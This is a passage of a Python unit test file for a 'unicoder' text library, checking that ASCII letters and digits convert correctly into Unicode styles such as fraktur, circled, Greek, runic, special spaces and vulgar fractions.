":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟") def test_513_bold_frak(self) -> None: uni = unicoder.convert("fatfrak", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅") def test_514_bold_frak(self) -> None: uni = unicoder.convert("boldblack", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅") def test_515_bold_frak(self) -> None: uni = unicoder.bold(unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟") def test_516_bold_frak(self) -> None: uni = unicoder.bold(unicoder.fraktur(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝖆𝖇𝖈𝖉𝖊𝖋𝖌𝖍𝖎𝖏𝖐𝖑𝖒𝖓𝖔𝖕𝖖𝖗𝖘𝖙𝖚𝖛𝖜𝖝𝖞𝖟") def test_517_bold_frak(self) -> None: uni = unicoder.bold(unicoder.fraktur(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅") def test_518_bold_frak(self) -> None: uni = unicoder.bold(unicoder.fraktur(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝕬𝕭𝕮𝕯𝕰𝕱𝕲𝕳𝕴𝕵𝕶𝕷𝕸𝕹𝕺𝕻𝕼𝕽𝕾𝕿𝖀𝖁𝖂𝖃𝖄𝖅") # def test_550_norm_button(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_551_norm_button(self) -> None: uni = unicoder.convert("button", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩") def test_552_norm_button(self) -> None: uni = unicoder.convert("button", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":🅰🅱🅲🅳🅴🅵🅶🅷🅸🅹🅺🅻🅼🅽🅾🅿🆀🆁🆂🆃🆄🆅🆆🆇🆈🆉") def test_553_numm_button(self) -> None: uni = unicoder.convert("button", base_0123456789) self.assertEqual(uni, ":⓿❶❷❸❹❺❻❼❽❾") def test_555_norm_button(self) -> None: uni = unicoder.button(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":🅐🅑🅒🅓🅔🅕🅖🅗🅘🅙🅚🅛🅜🅝🅞🅟🅠🅡🅢🅣🅤🅥🅦🅧🅨🅩") def test_556_norm_button(self) -> None: uni = unicoder.button(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":🅰🅱🅲🅳🅴🅵🅶🅷🅸🅹🅺🅻🅼🅽🅾🅿🆀🆁🆂🆃🆄🆅🆆🆇🆈🆉") def test_557_numm_button(self) -> None: uni = unicoder.button(base_0123456789) self.assertEqual(uni, ":⓿❶❷❸❹❺❻❼❽❾") def test_560_norm_circled(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_561_norm_circled(self) -> None: uni = unicoder.convert("circ", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ") def test_562_norm_circled(self) -> None: uni = unicoder.convert("circ", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ") def test_563_numm_circled(self) -> None: uni = unicoder.convert("circ", base_0123456789) self.assertEqual(uni, ":⓪①②③④⑤⑥⑦⑧⑨") def test_565_norm_circled(self) -> None: uni = unicoder.circled(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":ⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ") def test_566_norm_circled(self) -> None: uni = unicoder.circled(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏ") def test_567_numm_circled(self) -> None: uni = unicoder.circled(base_0123456789) self.assertEqual(uni, ":⓪①②③④⑤⑥⑦⑧⑨") def test_570_norm_parens(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_571_norm_parens(self) -> None: uni = unicoder.convert("parens", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵") def test_572_norm_parens(self) -> None: uni = unicoder.convert("parens", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":🄐🄑🄒🄓🄔🄕🄖🄗🄘🄙🄚🄛🄜🄝🄞🄟🄠🄡🄢🄣🄤🄥🄦🄧🄨🄩") def test_573_numm_parens(self) -> None: uni = unicoder.convert("parens", base_0123456789) self.assertEqual(uni, ":⒪⑴⑵⑶⑷⑸⑹⑺⑻⑼") def test_575_norm_parens(self) -> None: uni = unicoder.parens(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":⒜⒝⒞⒟⒠⒡⒢⒣⒤⒥⒦⒧⒨⒩⒪⒫⒬⒭⒮⒯⒰⒱⒲⒳⒴⒵") def test_576_norm_parens(self) -> None: uni = unicoder.parens(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":🄐🄑🄒🄓🄔🄕🄖🄗🄘🄙🄚🄛🄜🄝🄞🄟🄠🄡🄢🄣🄤🄥🄦🄧🄨🄩") def test_577_numm_parens(self) -> None: uni = unicoder.parens(base_0123456789) self.assertEqual(uni, ":⒪⑴⑵⑶⑷⑸⑹⑺⑻⑼") # def test_600_norm_greek(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_601_norm_greek(self) -> None: uni = unicoder.convert("greek", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ") def test_602_norm_greek(self) -> None: uni = unicoder.convert("math", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ") def test_603_norm_greek(self) -> None: uni = unicoder.convert("greek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ") def test_604_norm_greek(self) -> None: uni = unicoder.convert("math", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ") def test_605_norm_greek(self) -> None: uni = unicoder.greek(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ") def test_606_norm_greek(self) -> None: uni = unicoder.greek(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":αβχδεφγηιικλμνοπκρστω∂ψξυζ") def test_607_norm_greek(self) -> None: uni = unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ") def test_608_norm_greek(self) -> None: uni = unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ΑΒΧΔΕΦΓΗΙΙΚΛΜΝΟΠΚΡΣΤΩ∇ΨΞΥΖ") def test_621_bold_greek(self) -> None: uni = unicoder.convert("boldgreek", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇") def test_622_bold_greek(self) -> None: uni = unicoder.convert("fatmath", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇") def test_623_bold_greek(self) -> None: uni = unicoder.convert("boldgreek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭") def test_624_bold_greek(self) -> None: uni = unicoder.convert("fatmath", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭") def test_625_bold_greek(self) -> None: uni = unicoder.bold(unicoder.greek(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇") def test_626_bold_greek(self) -> None: uni = unicoder.greek(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝛂𝛃𝛘𝛅𝛆𝛗𝛄𝛈𝛊𝛊𝛋𝛌𝛍𝛎𝛐𝛑𝛋𝛒𝛔𝛕𝛚𝛛𝛙𝛏𝛖𝛇") def test_627_bold_greek(self) -> None: uni = unicoder.bold(unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭") def test_628_bold_greek(self) -> None: uni = unicoder.greek(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝚨𝚩𝚾𝚫𝚬𝚽𝚪𝚮𝚰𝚰𝚱𝚲𝚳𝚴𝚶𝚷𝚱𝚸𝚺𝚻𝛀𝛁𝚿𝚵𝚼𝚭") def test_641_ital_greek(self) -> None: uni = unicoder.convert("italgreek", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁") def test_642_ital_greek(self) -> None: uni = unicoder.convert("slantmath", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁") def test_643_ital_greek(self) -> None: uni = unicoder.convert("italgreek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧") def test_644_ital_greek(self) -> None: uni = unicoder.convert("slantmath", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧") def test_645_ital_greek(self) -> None: uni = unicoder.ital(unicoder.greek(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁") def test_646_ital_greek(self) -> None: uni = unicoder.greek(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz)) self.assertEqual(uni, ":𝛼𝛽𝜒𝛿𝜀𝜑𝛾𝜂𝜄𝜄𝜅𝜆𝜇𝜈𝜊𝜋𝜅𝜌𝜎𝜏𝜔𝜕𝜓𝜉𝜐𝜁") def test_647_ital_greek(self) -> None: uni = unicoder.ital(unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧") def test_648_ital_greek(self) -> None: uni = unicoder.greek(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ)) self.assertEqual(uni, ":𝛢𝛣𝛸𝛥𝛦𝛷𝛤𝛨𝛪𝛪𝛫𝛬𝛭𝛮𝛰𝛱𝛫𝛲𝛴𝛵𝛺𝛻𝛹𝛯𝛶𝛧") def test_661_bold_ital_greek(self) -> None: uni = unicoder.convert("bolditalgreek", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻") def test_662_bold_ital_greek(self) -> None: uni = unicoder.convert("fatslantmath", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻") def test_663_bold_ital_greek(self) -> None: uni = unicoder.convert("bolditalgreek", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_664_bold_ital_greek(self) -> None: uni = unicoder.convert("fatslantmath", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_665_bold_ital_greek(self) -> None: uni = unicoder.bold(unicoder.ital( unicoder.greek(base_abcdefghijklmnopqrstuvwxyz))) self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻") def test_666_bold_ital_greek(self) -> None: uni = unicoder.greek( unicoder.bold(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz))) self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻") def test_667_bold_ital_greek(self) -> None: uni = unicoder.bold(unicoder.ital( unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_668_bold_ital_greek(self) -> None: uni = unicoder.ital(unicoder.bold( unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_669_bold_ital_greek(self) -> None: uni = unicoder.greek( unicoder.bold(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_670_bold_ital_greek(self) -> None: uni = unicoder.bold( unicoder.greek(unicoder.ital(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_671_bold_ital_greek(self) -> None: uni = unicoder.ital( unicoder.greek(unicoder.bold(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_672_bold_ital_greek(self) -> None: uni = unicoder.bold( unicoder.ital(unicoder.greek(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ))) self.assertEqual(uni, ":𝜜𝜝𝜲𝜟𝜠𝜱𝜞𝜢𝜤𝜤𝜥𝜦𝜧𝜨𝜪𝜫𝜥𝜬𝜮𝜯𝜴𝜵𝜳𝜩𝜰𝜡") def test_673_bold_ital_greek(self) -> None: uni = unicoder.bold( unicoder.greek(unicoder.ital(base_abcdefghijklmnopqrstuvwxyz))) self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻") def test_674_bold_ital_greek(self) -> None: uni = unicoder.ital( unicoder.greek(unicoder.bold(base_abcdefghijklmnopqrstuvwxyz))) self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻") def test_675_bold_ital_greek(self) -> None: uni = unicoder.bold( unicoder.ital(unicoder.greek(base_abcdefghijklmnopqrstuvwxyz))) self.assertEqual(uni, ":𝜶𝜷𝝌𝜹𝜺𝝋𝜸𝜼𝜾𝜾𝜿𝝀𝝁𝝂𝝄𝝅𝜿𝝆𝝈𝝉𝝎𝝏𝝍𝝃𝝊𝜻") def test_680_norm_greek(self) -> None: uni = unicoder.convert("greek", ":foobar") self.assertEqual(uni, ":φωβαρ") def test_681_norm_greek(self) -> None: uni = unicoder.convert("greek", ":FOOBAR") self.assertEqual(uni, ":ΦΩΒΑΡ") def test_682_norm_greek(self) -> None: uni = unicoder.convert("boldgreek", ":foobar") self.assertEqual(uni, ":𝛗𝛚𝛃𝛂𝛒") def test_683_norm_greek(self) -> None: uni = unicoder.convert("boldgreek", ":FOOBAR") self.assertEqual(uni, ":𝚽𝛀𝚩𝚨𝚸") def test_684_norm_greek(self) -> None: uni = unicoder.convert("italgreek", ":foobar") self.assertEqual(uni, ":𝜑𝜔𝛽𝛼𝜌") def test_685_norm_greek(self) -> None: uni = unicoder.convert("italgreek", ":FOOBAR") self.assertEqual(uni, ":𝛷𝛺𝛣𝛢𝛲") def test_686_norm_greek(self) -> None: uni = unicoder.convert("italboldgreek", ":foobar") self.assertEqual(uni, ":𝝋𝝎𝜷𝜶𝝆") def test_687_norm_greek(self) -> None: uni = unicoder.convert("italboldgreek", ":FOOBAR") self.assertEqual(uni, ":𝜱𝜴𝜝𝜜𝜬") def test_690_norm_greek(self) -> None: uni = unicoder.greek(":foobar") self.assertEqual(uni, ":φωβαρ") def test_691_norm_greek(self) -> None: uni = unicoder.greek(":FOOBAR") self.assertEqual(uni, ":ΦΩΒΑΡ") def test_692_norm_greek(self) -> None: uni = unicoder.greek(unicoder.bold(":foobar")) self.assertEqual(uni, ":𝛗𝛚𝛃𝛂𝛒") def test_693_norm_greek(self) -> None: uni = unicoder.greek(unicoder.bold(":FOOBAR")) self.assertEqual(uni, ":𝚽𝛀𝚩𝚨𝚸") def test_694_norm_greek(self) -> None: uni = unicoder.greek(unicoder.ital(":foobar")) self.assertEqual(uni, ":𝜑𝜔𝛽𝛼𝜌") def test_695_norm_greek(self) -> None: uni = unicoder.greek(unicoder.ital(":FOOBAR")) self.assertEqual(uni, ":𝛷𝛺𝛣𝛢𝛲") def test_696_norm_greek(self) -> None: uni = unicoder.greek(unicoder.ital(unicoder.bold(":foobar"))) self.assertEqual(uni, ":𝝋𝝎𝜷𝜶𝝆") def test_697_norm_greek(self) -> None: uni = unicoder.greek(unicoder.ital(unicoder.bold(":FOOBAR"))) self.assertEqual(uni, ":𝜱𝜴𝜝𝜜𝜬") def test_698_norm_greek_notfound(self) -> None: old = unicoder.norm_greek_upper unicoder.norm_greek_upper = unicoder.norm_greek_lower uni = unicoder.greek(":FOOBAR") unicoder.norm_greek_upper = old self.assertEqual(uni, ":FOOBAR") def test_699_norm_greek_notfound(self) -> None: old = unicoder.norm_greek_lower unicoder.norm_greek_lower = unicoder.norm_greek_upper uni = unicoder.greek(unicoder.bold(":foobar")) unicoder.norm_greek_lower = old self.assertEqual(uni, ":foobar") # def test_700_norm_rune(self) -> None: uni = unicoder.convert("fix", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, base_abcdefghijklmnopqrstuvwxyz) def test_701_norm_rune(self) -> None: uni = unicoder.convert("rune", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ") def test_702_norm_rune(self) -> None: uni = unicoder.convert("futark", base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ") def test_703_norm_rune(self) -> None: uni = unicoder.convert("rune", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ") def test_704_norm_rune(self) -> None: uni = unicoder.convert("futark", base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ") def test_705_norm_rune(self) -> None: uni = unicoder.rune(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ") def test_706_norm_rune(self) -> None: uni = unicoder.rune(base_abcdefghijklmnopqrstuvwxyz) self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ") def test_707_norm_rune(self) -> None: uni = unicoder.rune(base_ABCDEFGHIJKLMNOPQRSTUVWXYZ) self.assertEqual(uni, ":ᚨᛒᚳᛞᛖᚠᚷᚺᛁᛡᚳᛚᛗᚾᛟᛈᚳᚱᛋᛏᚹᚹᛕᚳᛋᛇᛉ") def test_741_norm_rune_quaengeln(self) -> None: uni = unicoder.rune(":quaengeln") self.assertEqual(uni, ":ᚳᚨᛖᛜᛖᛚᚾ") def test_742_norm_rune_quaengeln(self) -> None: uni = unicoder.rune(":QUAENGELN") self.assertEqual(uni, ":ᚳᚨᛖᛜᛖᛚᚾ") def test_748_norm_rune_notfound(self) -> None: old = unicoder.norm_rune_lower unicoder.norm_rune_lower = unicoder.norm_greek_upper uni = unicoder.rune(":FOOBAR") unicoder.norm_rune_lower = old self.assertEqual(uni, ":foobar") def test_749_norm_rune_notfound(self) -> None: old = unicoder.norm_rune_lower unicoder.norm_rune_lower = unicoder.norm_greek_upper uni = unicoder.rune(":foobar") unicoder.norm_rune_lower = old self.assertEqual(uni, ":foobar") # def test_800_norm_value(self) -> None: txt = "15 km/h more" uni = unicoder.convert("fix", txt) self.assertEqual(uni, "15 km/h more") self.assertEqual(uni, txt) def test_801_thin_value(self) -> None: txt = "15 km/h more" uni = unicoder.convert("thin", txt) self.assertEqual(uni, "15 km/h more") self.assertNotEqual(uni, txt) def test_802_nobr_value(self) -> None: txt = "15 km/h more" uni = unicoder.convert("nobr", txt) self.assertEqual(uni, "15 km/h more") self.assertNotEqual(uni, txt) self.assertEqual(uni[2], ' ') self.assertEqual(uni[7], ' ') self.assertNotEqual(uni[2], uni[7]) def test_803_thin_nobr_value(self) -> None: txt = "15 km/h more" thin = unicoder.convert("thin", txt) nobr = unicoder.convert("nobr", txt) self.assertEqual(thin, "15 km/h more") self.assertEqual(nobr, "15 km/h more") self.assertNotEqual(thin, nobr) def test_809_thin_value_command(self) -> None: txt = "15 km/h more" uni = unicoder.convert("1+", txt) self.assertEqual(uni, "1+ 15 km/h more") self.assertNotEqual(uni, txt) def test_900_norm_1_8(self) -> None: txt = "15 1/8 km/h more" uni = unicoder.convert("fix", txt) self.assertEqual(uni, "15 1/8 km/h more") self.assertEqual(uni, txt) def test_901_norm_1_8(self) -> None: txt = "15 1/8 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅛ km/h more") self.assertNotEqual(uni, txt) def test_902_norm_2_8(self) -> None: txt = "15 2/8 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15¼ km/h more") self.assertNotEqual(uni, txt) def test_903_norm_3_8(self) -> None: txt = "15 3/8 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅜ km/h more") self.assertNotEqual(uni, txt) def test_904_norm_4_8(self) -> None: txt = "15 4/8 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15½ km/h more") self.assertNotEqual(uni, txt) def test_905_norm_5_8(self) -> None: txt = "15 5/8 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅝ km/h more") self.assertNotEqual(uni, txt) def test_906_norm_6_8(self) -> None: txt = "15 6/8 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15¾ km/h more") self.assertNotEqual(uni, txt) def test_907_norm_7_8(self) -> None: txt = "15 7/8 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15⅞ km/h more") self.assertNotEqual(uni, txt) def test_911_norm_1_4(self) -> None: txt = "15 1/4 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15¼ km/h more") self.assertNotEqual(uni, txt) def test_912_norm_2_4(self) -> None: txt = "15 2/4 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15½ km/h more") self.assertNotEqual(uni, txt) def test_913_norm_3_4(self) -> None: txt = "15 3/4 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15¾ km/h more") self.assertNotEqual(uni, txt) def test_914_norm_1_4(self) -> None: txt = "15 1/2 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15½ km/h more") self.assertNotEqual(uni, txt) def test_920_norm_0_6(self) -> None: txt = "15 0/6 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, "15↉ km/h more") self.assertNotEqual(uni, txt) def test_921_norm_1_6(self) -> None: txt = "15 1/6 km/h more" uni = unicoder.convert("fract", txt) self.assertEqual(uni, 